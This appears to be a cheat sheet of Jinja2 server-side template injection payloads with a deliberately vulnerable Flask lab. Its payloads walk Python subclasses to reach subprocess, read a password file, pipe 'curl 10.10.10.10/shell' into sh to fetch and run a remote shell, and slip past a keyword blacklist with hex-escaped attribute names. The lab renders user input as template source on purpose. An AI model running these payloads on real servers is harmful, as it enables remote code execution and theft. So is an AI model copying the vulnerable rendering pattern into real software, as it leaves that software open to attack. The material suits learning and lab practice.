SSTI (Server-Side Template Injection)

Todo

{{''.__class__.__mro__[1].__subclasses__()}}

We need to find the index of `subprocess.Popen` in that list

{{''.__class__.__mro__[1].__subclasses__()[250:]}}
{{''.__class__.__mro__[1].__subclasses__()[408]("cat+.passwd",shell=True,stdout=-1).communicate()[0].strip()}}

{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('curl+10.10.10.10/shell|sh')}}
{{ self._TemplateReference__context.joiner.__init__.__globals__.os }}
{{ self._TemplateReference__context.namespace.__init__.__globals__.os }}

Basic Lab (deliberately vulnerable Flask app)

from flask import Flask, request, render_template_string

app = Flask(__name__)  # the lab application; the route below is registered on it

# Substring blocklist checked against the raw ``cmd`` query parameter before it
# is handed to the template engine. Each entry is tested with ``in`` against the
# whole parameter, so order does not matter.
blacklist = [
    '.', '}}', '*', '[', ']', "'", '{{', '_', '+', '/', '-', '<', '>',
    'self', 'globals', 'builtins', 'import', 'init', 'class', 'mro',
    'getitem', 'config', 'base', 'safe',
]

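@app.route('/')
def index():
    """Render the ``cmd`` query parameter as a Jinja template (deliberately vulnerable lab).

    The only control is the module-level ``blacklist``: if any entry occurs as a
    substring of the raw parameter, a fixed template carrying the refusal
    message is rendered instead. Otherwise the parameter itself becomes the
    template source, which is the lab's intended SSTI sink.

    Returns the rendered response body as a string.
    """
    param = request.args.get('cmd', '')
    error = None

    # A substring blocklist is not a safe control for template source; it only
    # demonstrates how such filters are sidestepped.
    if any(blacklisted_word in param for blacklisted_word in blacklist):
        error = "L'utilisation de certains mots n'est pas autorisée."
        # The template is a constant and the message is passed as context data,
        # so it is rendered (the original computed the message and then discarded it).
        return render_template_string("{{ error }}", error=error)
    # SSTI sink: user input is the template *source*, so Jinja evaluates it
    # server-side. This is the lab's intentional vulnerability; the safe form is
    # render_template_string("{{ cmd }}", cmd=param), which treats input as data.
    return render_template_string(param, error=error)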

if __name__ == '__main__':
    # debug=True is for the lab only: besides the reloader, Flask's debug mode
    # enables the interactive debugger, which must never be exposed on a
    # reachable interface.
    app.run(debug=True)
{%with+a=request|attr("<@hex_escapes>application<@/hex_escapes>")|attr("<@hex_escapes>__globals__<@/hex_escapes>")|attr("<@hex_escapes>__getitem__<@/hex_escapes>")("<@hex_escapes>__builtins__<@/hex_escapes>")|attr("<@hex_escapes>__getitem__<@/hex_escapes>")("<@hex_escapes>__import__<@/hex_escapes>")("os")|attr("<@hex_escapes>popen<@/hex_escapes>")("<@hex_escapes>id<@/hex_escapes>")|attr("<@hex_escapes>read<@/hex_escapes>")()%}{%print(a)%}{%endwith%}

References
